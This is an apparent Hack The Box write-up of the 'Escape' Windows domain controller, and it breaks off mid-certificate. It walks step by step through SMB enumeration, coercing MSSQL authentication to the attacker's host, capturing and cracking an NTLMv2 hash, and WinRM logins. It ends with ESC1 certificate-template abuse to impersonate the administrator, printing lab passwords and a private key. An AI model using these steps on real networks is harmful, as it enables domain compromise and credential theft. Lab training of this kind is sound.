Escape

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Run a quick nmap scan

└─$ nmap -sC -sV -Pn -v 10.129.228.253                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 03:03 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:03
Completed Parallel DNS resolution of 1 host. at 03:03, 0.00s elapsed
Initiating SYN Stealth Scan at 03:03
Scanning 10.129.228.253 [1000 ports]
Discovered open port 445/tcp on 10.129.228.253
Discovered open port 53/tcp on 10.129.228.253
Discovered open port 135/tcp on 10.129.228.253
Discovered open port 139/tcp on 10.129.228.253
Discovered open port 593/tcp on 10.129.228.253
Discovered open port 389/tcp on 10.129.228.253
Discovered open port 1433/tcp on 10.129.228.253
Discovered open port 88/tcp on 10.129.228.253
Discovered open port 636/tcp on 10.129.228.253
Discovered open port 464/tcp on 10.129.228.253
Discovered open port 3269/tcp on 10.129.228.253
Discovered open port 3268/tcp on 10.129.228.253
Completed SYN Stealth Scan at 03:03, 7.25s elapsed (1000 total ports)
Initiating Service scan at 03:03
Scanning 12 services on 10.129.228.253
Completed Service scan at 03:04, 47.08s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.228.253.
Initiating NSE at 03:04
Completed NSE at 03:05, 40.18s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 2.73s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Nmap scan report for 10.129.228.253
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-12 15:03:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.228.253:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.228.253:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-12T15:02:09
| Not valid after:  2054-10-12T15:02:09
| MD5:   6b21:24f9:e4e3:c876:c251:2483:16c9:b9b5
|_SHA-1: 81ab:c3b1:46d0:f00c:0bc0:7edb:6970:6422:9c57:c1a9
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-time: 
|   date: 2024-10-12T15:04:36
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.68 seconds
           Raw packets sent: 1989 (87.516KB) | Rcvd: 13 (572B)

What is the domain name for Escape as enumerated from the LDAP service? sequel.htb

What is the name of the non-standard SMB share on Escape? Public

To enumerate SMB shares we will try list out the shares using smbclient and anonymous login

└─$ smbclient -L \\\\10.129.228.253\\
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.253 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

What is the password for the PublicUser on MSSQL?

We will enumerate SMB share a bit more to find out. We will download SQL Server Procedures.pdf.

└─$ smbclient \\\\10.129.228.253\\public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1440678 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (65.0 KiloBytes/sec) (average 65.0 KiloBytes/sec)
smb: \> exit

Upon reading the pdf, we get the public user credentials

cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password>

user PublicUser and password GuestUserCantWrite1

What user is the MSSQL instance running as? sql_svc

Get the MSSQL server to read a file from an SMB host you control, and watch for the authentication.

With the creds, I can connect to the MSSQL server. I’ll use the Impacket tool mssqlclient.py:

└─$ impacket-mssqlclient sequel.htb/PublicUser@10.129.228.253 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands

There are four databases on this server:

SQL (PublicUser  guest@master)> select name from master..sysdatabases;
name     
------   
master   

tempdb   

model    

msdb

I tried running commands through MSSQL server using the xp_cmdshell stored procedure. Unfortunately I get permission denied:

SQL (PublicUser  guest@master)> xp_cmdshell whoami;
ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

The next thing to try is to get the SQL server to connect back to our host and authenticate, and capture a challenge or response.

We will start Responder here as root listening on a bunch of services for the tun0 interface:

└─$ sudo python3 /usr/share/responder/Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [OFF]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [OFF]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [OFF]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.8]
    Responder IPv6             [dead:beef:2::1006]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-9A6WSBC7SGR]
    Responder Domain Name      [Q02Q.LOCAL]
    Responder DCE-RPC Port     [49413]

[+] Listening for events...

Remember to turn off unnecessary services such as HTTPS, LDAPS and winRM in Responder config

└─$ sudo nano /usr/share/responder/Responder.conf

Now we will tell MSSQL to read a file on a share on my host:

SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.14.8\share', 1, 1
subdirectory   depth   file   
------------   -----   ----

The responder captures hash

[+] Listening for events...                                                                                         

[SMB] NTLMv2-SSP Client   : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:a18f0f31fd5a9e73:949209A630AB7E59E106E366CC2F429B:010100000000000000F4F502561CDB0172ECD403C591980B0000000002000800510030003200510001001E00570049004E002D003900410036005700530042004300370053004700520004003400570049004E002D00390041003600570053004200430037005300470052002E0051003000320051002E004C004F00430041004C000300140051003000320051002E004C004F00430041004C000500140051003000320051002E004C004F00430041004C000700080000F4F502561CDB0106000400020000000800300030000000000000000000000000300000EFB4F169095B479DBEFC1891A254C898D4E56D62F13DEB44F2A502661CC742F10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0038000000000000000000

We will use hashcat to crack this NTLMv2 Hhsh.

We can identify which hashcat module number to use by running

└─$ hashcat --help | grep -i ntlmv2

   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol

We will copy and save the hash as sql_svc.hash and will run hashcat to crack it

└─$ hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt

SQL_SVC::sequel:a18f0f31fd5a9e73:949209a630ab7e59e106e366cc2f429b:010100000000000000f4f502561cdb0172ecd403c591980b0000000002000800510030003200510001001e00570049004e002d003900410036005700530042004300370053004700520004003400570049004e002d00390041003600570053004200430037005300470052002e0051003000320051002e004c004f00430041004c000300140051003000320051002e004c004f00430041004c000500140051003000320051002e004c004f00430041004c000700080000f4f502561cdb0106000400020000000800300030000000000000000000000000300000efb4f169095b479dbefc1891a254c898d4e56d62f13deb44f2a502661cc742f10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0038000000000000000000:REGGIE1234ronnie

What is the sql_svc user's password? REGGIE1234ronnie

What is the Ryan.Cooper user's password? Enumerate the SQLServer logs. It seems Ryan entered a password as a username at least once.

Running nxc winrm we can see that winrm is enabled on the DC

└─$ nxc winrm 10.129.228.253                                                                         
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)

Use evil-winrm with sql_svc’s credential

└─$ evil-winrm -i 10.129.228.253 -u sql_svc -p REGGIE1234ronnie

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>

Navigating through the directory, we can see a log file in C:\SQLServer\Logs\ERRORLOG.BAK

*Evil-WinRM* PS C:\SQLServer\Logs> ls


    Directory: C:\SQLServer\Logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK


*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK

Upon reading through the logs, we see Ryan.Cooper has entered his password.

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51      Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51      Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s      SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s      .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s      SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.

Open up another evil-winrm session using Ryan Cooper’s credential.

Find the user.txt located on Ryan’s Desktop.

└─$ evil-winrm -i 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ls
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ls


    Directory: C:\Users\Ryan.Cooper\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/12/2024   8:02 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> cat user.txt
ee206be1fed80997ddc918f87dfa1bc3
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc
   Primary Dns Suffix  . . . . . . . : sequel.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : sequel.htb
                                       .htb

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
   Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
   Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 9:31:29 AM
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DHCPv6 IAID . . . . . . . . . . . : 251678806
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
   DNS Servers . . . . . . . . . . . : 127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

What is the name of the vulnerable ADCS template on Escape? Try a tool like Certify or Certipy to enumerate ADCS. We will look for Active Directory Certificate Services (ADCS). A quick way to check for this is using nxc or crackmampexec

└─$ nxc ldap 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3 -M adcs
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.228.253  636    DC               [+] sequel.htb\ryan.cooper:NuclearMosquito3 
ADCS        10.129.228.253  389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.129.228.253  389    DC               Found PKI Enrollment Server: dc.sequel.htb
ADCS        10.129.228.253  389    DC               Found CN: sequel-DC-CA

We will need to see if there are any templates in this ADCS that are insecurely configured. To enumerate further, we will upload a copy of Certify by downloading a copy from SharpCollection, and uploading it to Escape:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload Certify.exe
                                        
Info: Uploading /home/kali/Tools/Certify.exe to C:\Users\Ryan.Cooper\documents\Certify.exe
                                        
Data: 238248 bytes of 238248 bytes copied
                                        
Info: Upload successful!

We will run Certify.exe find /vulnerable /currentuser to look across the groups for the current user. The Certify then lists a single vulnerable certificate template:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe find /vulnerable /currentuser

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.2391560

The danger here is that sequel\Domain Users has Enrollment Rights for the certificate.

What is the name of the vulnerable ADCS template on Escape? UserAuthentication

What is the administrator user's NTLM hash? Exploit the ESC1 vulnerability in the UserAuthentication template to leak this. We will run Certify.exe to request a certificate with an alternative name of administrator. It returns a cert.pem:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 13

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAvuDH2SU6wGWrAKH+gxXuHFbPqoD0xktI7RQP7C48q9edSUi1
gW9q6rwDk2qgvTF/C36Eh4HsLOsH+bMs9kdJIMKym8EypZ+t9kj87TXcQimoizUK
uSI4Y0rHVCJRDVGMLqm7cpgRjqNqFOufQ0LPtLUR2yHm/AZ1RDpXK15AAcpjLnHW
KgH1MS5GmG8VYmqP3IbNooSR9Y21KDV5pUeK9RrbAL2lTBLD+iEZgP/+JSNweC7v
IX+NTH711lZeFYlzmK0jAswQD5+c6Z5+4T/eZQoWFVCL1WM0moLxouIZKKtpFzHs
qV/66Qz3OsRBko2nzUBFKnzMoWmPgQUuAIJqSQIDAQABAoIBAQCfrFuhm5ItNh85
dUn6EFNSo5AumpeodXv4zuqO8RLR0ZmCn28uaqzu1f7Lx8vU2F3lmJ122clevfG7
ARbgojtbS2OsBY6/m/cjamUibgbl1gFnCiUBP84ZyYk7KUXSNWBl/JiQwQMW5j6s
Z3qgAnjMOxhHznFybFiWjZMz9TDoDRok4S6fRs3/KF2UJBd8fryoXwoAvP15fRPr
X1LmVu2fWZPv3xV4piSvtkr2Fn810CLByGJaDNYJctkCOP7eZio3POY1SaVATYm0
34C4WCg8a3u6wgDgGB60Xa685y+3bdf2G62WKm6B3AXQamPswnHQ2GRnz3VlsOGY
bUSZduMNAoGBAOssuf3PsTO6Z8mLp0toNnCsWmZKJG78IyLTMTcRB0qwG5NqLaS0
ORkW0mbVMuEd8rjksPYDhbUivuPnHspv5Th06WynkN3lBheEz1hGtqBZVIYSh+3c
kXwXsfBMKDafCJTMGIdWPv1lwdKTuX2/20X6hczrJFwxnLHXJ1EqtfHPAoGBAM/H
3+cuZDZp4YbK/zy6uD8moVjDX8kQaB0O7z7n3Xr89D59XYqTXCSnAmJ2+OJzlpEx
UEty8B4EwPgaHwFJaaJkND4GeEawfcikn2IJ5+8V0fZR8YnLVTsaSUY2VWlXNh14
cBG1GK9EpOE/9dRj1bIGwXymYCSdvPu6v2+B9+BnAoGAa+sYZop6bJxrqCc32/i0
krvkt+/qDCwUC5USjox35iQuY1VkIKK7WPIKFzpaoMdXbNU1B4/SOa76HicfEBKN
A31S6JN0fP7t7rj5VS8N+0NC8EtsqRCAiottEjJAeeA81dtanjBLs4iQiwtTIYt7
Gf++iqyVAOGbYFi1KCALYi0CgYEApAGuuHoj29eDjrQY98SiviYt4TSGHNz4cUdi
jRLT/cpAuDqYZVOfvcad2T7zgTufs4drS8Kzyd4Su0NTCd76pJXXrsXIlnOlNYTL
0cTj8BIXIwjXUN7QrdA32lX04StXqbdxLmj1zRKv2qRz1GvhN56hh1SEOyLPExv7
E3dRQy0CgYEAvDqiBKupCzNnga/UbJlCp5/dffn0DUu4dwXjjZYnHhQV0d/EIsik
M9ZmgBQbPUaqQnEFkI9idm+vqZIpLY/OrXoFoqnPosX2d7uSt5Pd0LwUcqbxBKS4
UOXfFh4k2J/u45o40tEOJRotL6DSdjLtJb7ieH5pvnIbRK3/8ErFxzg=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA1eTE2g25X18AAAAAAADTANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQxMDEyMTYxMzE4WhcNMzQxMDEw
MTYxMzE4WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC+4MfZJTrAZasAof6DFe4cVs+q
gPTGS0jtFA/sLjyr151JSLWBb2rqvAOTaqC9MX8LfoSHgews6wf5syz2R0kgwrKb
wTKln632SPztNdxCKaiLNQq5IjhjSsdUIlENUYwuqbtymBGOo2oU659DQs+0tRHb
Ieb8BnVEOlcrXkABymMucdYqAfUxLkaYbxViao/chs2ihJH1jbUoNXmlR4r1GtsA
vaVMEsP6IRmA//4lI3B4Lu8hf41MfvXWVl4ViXOYrSMCzBAPn5zpnn7hP95lChYV
UIvVYzSagvGi4hkoq2kXMeypX/rpDPc6xEGSjafNQEUqfMyhaY+BBS4AgmpJAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI
